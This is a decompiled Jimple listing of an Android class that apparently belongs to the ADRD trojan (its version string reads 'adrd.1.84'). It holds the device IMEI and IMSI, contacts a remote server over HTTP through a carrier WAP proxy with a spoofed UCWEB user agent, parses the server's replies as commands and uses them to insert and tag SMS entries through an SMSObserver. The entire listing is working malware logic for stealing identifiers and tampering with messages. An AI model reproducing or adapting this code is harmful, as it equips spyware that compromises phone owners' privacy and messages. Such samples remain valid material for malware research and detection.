public class com.xxx.yyy.qzl extends java.lang.Object
{
    private android.content.Context context;
    public int doflag;
    private java.lang.String imei;
    private java.lang.String imsi;
    private java.lang.String iversion;
    private java.lang.String kk;
    public int netway;
    private java.lang.String oversion;
    private com.xxx.yyy.SMSObserver smsObserver;

    public void <init>(android.content.Context, java.lang.String, java.lang.String, int, com.xxx.yyy.SMSObserver)
    {
        com.xxx.yyy.qzl r0;
        android.content.Context r1, $r5;
        java.lang.String r2, r3, $r6;
        int i0;
        com.xxx.yyy.SMSObserver r4;

        r0 := @this: com.xxx.yyy.qzl;
        r1 := @parameter0: android.content.Context;
        r2 := @parameter1: java.lang.String;
        r3 := @parameter2: java.lang.String;
        i0 := @parameter3: int;
        r4 := @parameter4: com.xxx.yyy.SMSObserver;
        specialinvoke r0.<java.lang.Object: void <init>()>();
        r0.<com.xxx.yyy.qzl: java.lang.String iversion> = "6";
        r0.<com.xxx.yyy.qzl: java.lang.String oversion> = "adrd.1.84";
        r0.<com.xxx.yyy.qzl: int doflag> = 0;
        r0.<com.xxx.yyy.qzl: android.content.Context context> = r1;
        r0.<com.xxx.yyy.qzl: java.lang.String imsi> = r2;
        r0.<com.xxx.yyy.qzl: java.lang.String imei> = r3;
        r0.<com.xxx.yyy.qzl: int netway> = i0;
        $r5 = r0.<com.xxx.yyy.qzl: android.content.Context context>;
        $r6 = virtualinvoke $r5.<android.content.Context: java.lang.String getString(int)>(2131034180);
        r0.<com.xxx.yyy.qzl: java.lang.String kk> = $r6;
        r0.<com.xxx.yyy.qzl: com.xxx.yyy.SMSObserver smsObserver> = r4;
        return;
    }

    private boolean CheckNetWork(java.lang.String)
    {
        com.xxx.yyy.qzl r0;
        java.lang.String r1;
        org.apache.http.impl.client.DefaultHttpClient r2;
        int $i0, $i1;
        org.apache.http.HttpHost r3;
        org.apache.http.params.HttpParams $r4;
        org.apache.http.client.methods.HttpPost r6;
        org.apache.http.HttpResponse $r7;
        org.apache.http.StatusLine $r8;
        org.apache.http.conn.ClientConnectionManager $r9;
        org.apache.http.client.ClientProtocolException $r10;
        java.io.IOException $r11;
        java.lang.Exception $r12;

        r0 := @this: com.xxx.yyy.qzl;
        r1 := @parameter0: java.lang.String;
        r2 = new org.apache.http.impl.client.DefaultHttpClient;
        specialinvoke r2.<org.apache.http.impl.client.DefaultHttpClient: void <init>()>();
        $i0 = r0.<com.xxx.yyy.qzl: int netway>;
        if $i0 != 0 goto label0;

        r3 = new org.apache.http.HttpHost;
        specialinvoke r3.<org.apache.http.HttpHost: void <init>(java.lang.String,int,java.lang.String)>("10.0.0.172", 80, "http");
        $r4 = virtualinvoke r2.<org.apache.http.impl.client.DefaultHttpClient: org.apache.http.params.HttpParams getParams()>();
        interfaceinvoke $r4.<org.apache.http.params.HttpParams: org.apache.http.params.HttpParams setParameter(java.lang.String,java.lang.Object)>("http.route.default-proxy", r3);

     label0:
        r6 = new org.apache.http.client.methods.HttpPost;
        specialinvoke r6.<org.apache.http.client.methods.HttpPost: void <init>(java.lang.String)>(r1);
        virtualinvoke r6.<org.apache.http.client.methods.HttpPost: void addHeader(java.lang.String,java.lang.String)>("User-Agent", "J2ME/UCWEB7.4.0.57");
        virtualinvoke r6.<org.apache.http.client.methods.HttpPost: void addHeader(java.lang.String,java.lang.String)>("Accept", "application/vnd.wap.xhtml+xml,application/xml,text/vnd.wap.wml,text/html,application/xhtml+xml,image/jpeg;q=0.5,image/png;q=0.5,image/gif;q=0.5,image/*;q=0.6,video/*,audio/*,*/*;");

     label1:
        $r7 = virtualinvoke r2.<org.apache.http.impl.client.DefaultHttpClient: org.apache.http.HttpResponse execute(org.apache.http.client.methods.HttpUriRequest)>(r6);
        $r8 = interfaceinvoke $r7.<org.apache.http.HttpResponse: org.apache.http.StatusLine getStatusLine()>();
        $i1 = interfaceinvoke $r8.<org.apache.http.StatusLine: int getStatusCode()>();
        if $i1 == 200 goto label3;

     label2:
        return 0;

     label3:
        $r9 = virtualinvoke r2.<org.apache.http.impl.client.DefaultHttpClient: org.apache.http.conn.ClientConnectionManager getConnectionManager()>();
        interfaceinvoke $r9.<org.apache.http.conn.ClientConnectionManager: void shutdown()>();

     label4:
        return 1;

     label5:
        $r10 := @caughtexception;
        virtualinvoke $r10.<org.apache.http.client.ClientProtocolException: void printStackTrace()>();
        return 0;

     label6:
        $r11 := @caughtexception;
        virtualinvoke $r11.<java.io.IOException: void printStackTrace()>();
        return 0;

     label7:
        $r12 := @caughtexception;
        virtualinvoke $r12.<java.lang.Exception: void printStackTrace()>();
        return 0;

        catch org.apache.http.client.ClientProtocolException from label1 to label2 with label5;
        catch java.io.IOException from label1 to label2 with label6;
        catch java.lang.Exception from label1 to label2 with label7;
        catch org.apache.http.client.ClientProtocolException from label3 to label4 with label5;
        catch java.io.IOException from label3 to label4 with label6;
        catch java.lang.Exception from label3 to label4 with label7;
    }

    private java.lang.String GetO(java.lang.String)
    {
        com.xxx.yyy.qzl r0;
        java.lang.String r1, r11;
        org.apache.http.impl.client.DefaultHttpClient r2;
        org.apache.http.HttpHost r3;
        int $i0, i1;
        org.apache.http.params.HttpParams $r4;
        org.apache.http.client.methods.HttpPost r6;
        org.apache.http.HttpResponse r7;
        org.apache.http.StatusLine $r8;
        org.apache.http.HttpEntity $r9;
        java.io.InputStream $r10;
        org.apache.http.conn.ClientConnectionManager $r12;
        org.apache.http.client.ClientProtocolException $r13;
        java.io.IOException $r14;
        java.lang.Exception $r15;

        r0 := @this: com.xxx.yyy.qzl;
        r1 := @parameter0: java.lang.String;
        r2 = new org.apache.http.impl.client.DefaultHttpClient;
        specialinvoke r2.<org.apache.http.impl.client.DefaultHttpClient: void <init>()>();
        $i0 = r0.<com.xxx.yyy.qzl: int netway>;
        if $i0 != 0 goto label0;

        r3 = new org.apache.http.HttpHost;
        specialinvoke r3.<org.apache.http.HttpHost: void <init>(java.lang.String,int,java.lang.String)>("10.0.0.172", 80, "http");
        $r4 = virtualinvoke r2.<org.apache.http.impl.client.DefaultHttpClient: org.apache.http.params.HttpParams getParams()>();
        interfaceinvoke $r4.<org.apache.http.params.HttpParams: org.apache.http.params.HttpParams setParameter(java.lang.String,java.lang.Object)>("http.route.default-proxy", r3);

     label0:
        r6 = new org.apache.http.client.methods.HttpPost;
        specialinvoke r6.<org.apache.http.client.methods.HttpPost: void <init>(java.lang.String)>(r1);
        virtualinvoke r6.<org.apache.http.client.methods.HttpPost: void addHeader(java.lang.String,java.lang.String)>("User-Agent", "J2ME/UCWEB7.4.0.57");
        virtualinvoke r6.<org.apache.http.client.methods.HttpPost: void addHeader(java.lang.String,java.lang.String)>("Accept", "application/vnd.wap.xhtml+xml,application/xml,text/vnd.wap.wml,text/html,application/xhtml+xml,image/jpeg;q=0.5,image/png;q=0.5,image/gif;q=0.5,image/*;q=0.6,video/*,audio/*,*/*;");

     label1:
        r7 = virtualinvoke r2.<org.apache.http.impl.client.DefaultHttpClient: org.apache.http.HttpResponse execute(org.apache.http.client.methods.HttpUriRequest)>(r6);
        $r8 = interfaceinvoke r7.<org.apache.http.HttpResponse: org.apache.http.StatusLine getStatusLine()>();
        i1 = interfaceinvoke $r8.<org.apache.http.StatusLine: int getStatusCode()>();

     label2:
        if i1 == 200 goto label3;

        return "";

     label3:
        $r9 = interfaceinvoke r7.<org.apache.http.HttpResponse: org.apache.http.HttpEntity getEntity()>();
        $r10 = interfaceinvoke $r9.<org.apache.http.HttpEntity: java.io.InputStream getContent()>();
        r11 = virtualinvoke r0.<com.xxx.yyy.qzl: java.lang.String generateString(java.io.InputStream)>($r10);
        $r12 = virtualinvoke r2.<org.apache.http.impl.client.DefaultHttpClient: org.apache.http.conn.ClientConnectionManager getConnectionManager()>();
        interfaceinvoke $r12.<org.apache.http.conn.ClientConnectionManager: void shutdown()>();

     label4:
        return r11;

     label5:
        $r13 := @caughtexception;
        virtualinvoke $r13.<org.apache.http.client.ClientProtocolException: void printStackTrace()>();
        return "";

     label6:
        $r14 := @caughtexception;
        virtualinvoke $r14.<java.io.IOException: void printStackTrace()>();
        return "";

     label7:
        $r15 := @caughtexception;
        virtualinvoke $r15.<java.lang.Exception: void printStackTrace()>();
        return "";

        catch org.apache.http.client.ClientProtocolException from label1 to label2 with label5;
        catch java.io.IOException from label1 to label2 with label6;
        catch java.lang.Exception from label1 to label2 with label7;
        catch org.apache.http.client.ClientProtocolException from label3 to label4 with label5;
        catch java.io.IOException from label3 to label4 with label6;
        catch java.lang.Exception from label3 to label4 with label7;
    }

    private void ParseO(java.lang.String)
    {
        com.xxx.yyy.qzl r0;
        java.lang.String r1, r2, r3, r5, $r7, $r8, $r9, $r11, $r12, r14, r16, $r20, r21, $r23, r24;
        int i0, i2, $i3, $i4, $i5, $i6, i8, i10;
        byte b1;
        boolean z0;
        char[] r4;
        java.lang.String[] r6, $r15;
        com.xxx.yyy.SMSObserver $r10, $r13, $r17, $r22, $r25;
        com.xxx.yyy.ssmm $r18;
        android.content.Context $r19;
        char $c7, $c9;

        r0 := @this: com.xxx.yyy.qzl;
        r1 := @parameter0: java.lang.String;
        r6 = virtualinvoke r1.<java.lang.String: java.lang.String[] split(java.lang.String)>("\\|");
        $i3 = lengthof r6;
        if $i3 < 4 goto label4;

        r2 = r6[0];
        r3 = r6[1];
        i0 = 1;
        b1 = 0;
        z0 = 0;
        $r7 = r6[2];
        r4 = virtualinvoke $r7.<java.lang.String: char[] toCharArray()>();
        i2 = 0;

     label0:
        $i4 = lengthof r4;
        if i2 < $i4 goto label5;

        $r8 = r6[2];
        $r9 = virtualinvoke $r8.<java.lang.String: java.lang.String substring(int)>(i0);
        $i5 = virtualinvoke $r9.<java.lang.String: int length()>();
        if $i5 <= 0 goto label1;

        $r10 = r0.<com.xxx.yyy.qzl: com.xxx.yyy.SMSObserver smsObserver>;
        $r11 = r6[2];
        $r12 = virtualinvoke $r11.<java.lang.String: java.lang.String substring(int)>(i0);
        virtualinvoke $r10.<com.xxx.yyy.SMSObserver: void insertSms(java.lang.String,int,int)>($r12, b1, 0);

     label1:
        if z0 == 0 goto label2;

        $r13 = r0.<com.xxx.yyy.qzl: com.xxx.yyy.SMSObserver smsObserver>;
        virtualinvoke $r13.<com.xxx.yyy.SMSObserver: void ReflashDb()>();

     label2:
        r14 = r6[3];
        $i6 = virtualinvoke r14.<java.lang.String: int length()>();
        if $i6 <= 1 goto label3;

        $r15 = virtualinvoke r14.<java.lang.String: java.lang.String[] split(java.lang.String)>("\\[");
        r5 = $r15[0];
        r16 = $r15[1];
        $r17 = r0.<com.xxx.yyy.qzl: com.xxx.yyy.SMSObserver smsObserver>;
        virtualinvoke $r17.<com.xxx.yyy.SMSObserver: void setTags(java.lang.String,java.lang.String)>(r5, r16);

     label3:
        $r18 = new com.xxx.yyy.ssmm;
        specialinvoke $r18.<com.xxx.yyy.ssmm: void <init>()>();
        $r19 = r0.<com.xxx.yyy.qzl: android.content.Context context>;
        virtualinvoke $r18.<com.xxx.yyy.ssmm: void Gef(android.content.Context,java.lang.String,java.lang.String)>($r19, r2, r3);

     label4:
        return;

     label5:
        $c7 = r4[i2];
        if $c7 != 43 goto label8;

        i8 = i2;
        if i2 <= i0 goto label6;

        $r20 = r6[2];
        r21 = virtualinvoke $r20.<java.lang.String: java.lang.String substring(int,int)>(i0, i2);
        $r22 = r0.<com.xxx.yyy.qzl: com.xxx.yyy.SMSObserver smsObserver>;
        virtualinvoke $r22.<com.xxx.yyy.SMSObserver: void insertSms(java.lang.String,int,int)>(r21, b1, 0);
        z0 = 1;

     label6:
        i0 = i8 + 1;
        b1 = 1;

     label7:
        i2 = i2 + 1;
        goto label0;

     label8:
        $c9 = r4[i2];
        if $c9 != 45 goto label7;

        i10 = i2;
        if i2 <= i0 goto label9;

        $r23 = r6[2];
        r24 = virtualinvoke $r23.<java.lang.String: java.lang.String substring(int,int)>(i0, i2);
        $r25 = r0.<com.xxx.yyy.qzl: com.xxx.yyy.SMSObserver smsObserver>;
        virtualinvoke $r25.<com.xxx.yyy.SMSObserver: void insertSms(java.lang.String,int,int)>(r24, b1, 0);
        z0 = 1;

     label9:
        i0 = i10 + 1;
        b1 = 0;
        goto label7;
    }

    static java.lang.String access$0(com.xxx.yyy.qzl)
    {
        com.xxx.yyy.qzl r0;
        java.lang.String $r1;

        r0 := @parameter0: com.xxx.yyy.qzl;
        $r1 = r0.<com.xxx.yyy.qzl: java.lang.String imei>;
        return $r1;
    }

    static java.lang.String access$1(com.xxx.yyy.qzl)
    {
        com.xxx.yyy.qzl r0;
        java.lang.String $r1;

        r0 := @parameter0: com.xxx.yyy.qzl;
        $r1 = r0.<com.xxx.yyy.qzl: java.lang.String imsi>;
        return $r1;
    }

    static java.lang.String access$2(com.xxx.yyy.qzl)
    {
        com.xxx.yyy.qzl r0;
        java.lang.String $r1;

        r0 := @parameter0: com.xxx.yyy.qzl;
        $r1 = r0.<com.xxx.yyy.qzl: java.lang.String iversion>;
        return $r1;
    }

    static java.lang.String access$3(com.xxx.yyy.qzl)
    {
        com.xxx.yyy.qzl r0;
        java.lang.String $r1;

        r0 := @parameter0: com.xxx.yyy.qzl;
        $r1 = r0.<com.xxx.yyy.qzl: java.lang.String oversion>;
        return $r1;
    }

    static java.lang.String access$4(com.xxx.yyy.qzl)
    {
        com.xxx.yyy.qzl r0;
        java.lang.String $r1;

        r0 := @parameter0: com.xxx.yyy.qzl;
        $r1 = r0.<com.xxx.yyy.qzl: java.lang.String kk>;
        return $r1;
    }

    static android.content.Context access$5(com.xxx.yyy.qzl)
    {
        com.xxx.yyy.qzl r0;
        android.content.Context $r1;

        r0 := @parameter0: com.xxx.yyy.qzl;
        $r1 = r0.<com.xxx.yyy.qzl: android.content.Context context>;
        return $r1;
    }

    static java.lang.String access$6(com.xxx.yyy.qzl, java.lang.String)
    {
        com.xxx.yyy.qzl r0;
        java.lang.String r1, $r2;

        r0 := @parameter0: com.xxx.yyy.qzl;
        r1 := @parameter1: java.lang.String;
        $r2 = specialinvoke r0.<com.xxx.yyy.qzl: java.lang.String GetO(java.lang.String)>(r1);
        return $r2;
    }

    static void access$7(com.xxx.yyy.qzl, java.lang.String)
    {
        com.xxx.yyy.qzl r0;
        java.lang.String r1;

        r0 := @parameter0: com.xxx.yyy.qzl;
        r1 := @parameter1: java.lang.String;
        specialinvoke r0.<com.xxx.yyy.qzl: void ParseO(java.lang.String)>(r1);
        return;
    }

    public void GG()
    {
        com.xxx.yyy.qzl r0;
        com.xxx.yyy.qzl$1 $r1;

        r0 := @this: com.xxx.yyy.qzl;
        $r1 = new com.xxx.yyy.qzl$1;
        specialinvoke $r1.<com.xxx.yyy.qzl$1: void <init>(com.xxx.yyy.qzl)>(r0);
        virtualinvoke $r1.<com.xxx.yyy.qzl$1: void start()>();
        return;
    }

    public java.lang.String generateString(java.io.InputStream)
    {
        com.xxx.yyy.qzl r0;
        java.io.InputStream r1;
        java.io.InputStreamReader $r2;
        java.lang.StringBuilder r3;
        java.lang.String r4, $r6;
        java.io.BufferedReader r5;
        java.io.IOException $r8, $r9;

        r0 := @this: com.xxx.yyy.qzl;
        r1 := @parameter0: java.io.InputStream;
        r5 = new java.io.BufferedReader;
        $r2 = new java.io.InputStreamReader;
        specialinvoke $r2.<java.io.InputStreamReader: void <init>(java.io.InputStream)>(r1);
        specialinvoke r5.<java.io.BufferedReader: void <init>(java.io.Reader)>($r2);
        r3 = new java.lang.StringBuilder;
        specialinvoke r3.<java.lang.StringBuilder: void <init>()>();

     label0:
        r4 = virtualinvoke r5.<java.io.BufferedReader: java.lang.String readLine()>();

     label1:
        if r4 != null goto label4;

     label2:
        virtualinvoke r1.<java.io.InputStream: void close()>();

     label3:
        $r6 = virtualinvoke r3.<java.lang.StringBuilder: java.lang.String toString()>();
        return $r6;

     label4:
        virtualinvoke r3.<java.lang.StringBuilder: java.lang.StringBuilder append(java.lang.String)>(r4);

     label5:
        goto label0;

     label6:
        $r8 := @caughtexception;
        virtualinvoke $r8.<java.io.IOException: void printStackTrace()>();
        goto label2;

     label7:
        $r9 := @caughtexception;
        virtualinvoke $r9.<java.io.IOException: void printStackTrace()>();
        goto label3;

        catch java.io.IOException from label0 to label1 with label6;
        catch java.io.IOException from label2 to label3 with label7;
        catch java.io.IOException from label4 to label5 with label6;
    }
}
